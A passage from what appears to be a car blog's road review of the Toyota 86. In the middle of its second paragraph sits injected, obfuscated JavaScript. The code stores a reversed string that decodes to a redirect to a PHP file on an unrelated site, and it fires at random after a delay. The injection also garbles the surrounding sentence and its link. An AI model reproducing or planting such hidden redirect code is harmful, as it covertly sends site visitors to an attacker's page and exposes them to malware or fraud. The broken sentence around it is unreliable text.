So after a few more picture collecting missions it was all aboard the 86 train. Yes, having two big doors makes entry easy when you have space, but fiddling with the mechanisms was beginning to get a bit tiresome in the heat. Come winter time and with the boys knowing what they were doing, all would be fine I’m sure.
Not the best hunting ground for a Toyota 86, but fun none the less. Surprisingly, it’s roads like this that the 86 feels at its most exposed. That stunningly engineered loose rear end, is exactly what you don’t want at the high-side of the legal limit. Casting my mind back to the day both Phill Tromans and myself $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/renault-clio-rs-vs-toyota-86-fun-factor/” target=”_blank”>hacked the 86 along similar roads with a Renault Clio RS, I can see now why I romped off down the road in the little French number. At these speeds, Phill must have been thinking a full rotation was on the cards at any given moment (well, either that or a hero style drift into the barriers).
A good sign for the NVH (noise, vibration, harshness) levels of the Toyota 86? Yes, there is no denying the car has been built to a core price, but there is no hiding from the fact that the basics have been covered. If you are happy to get over the primary touch points and hard plastics, the car is all the better for it.
After a good hour in the driving seat it was time for a quick break and a bite to eat…
…McDonalds all round!
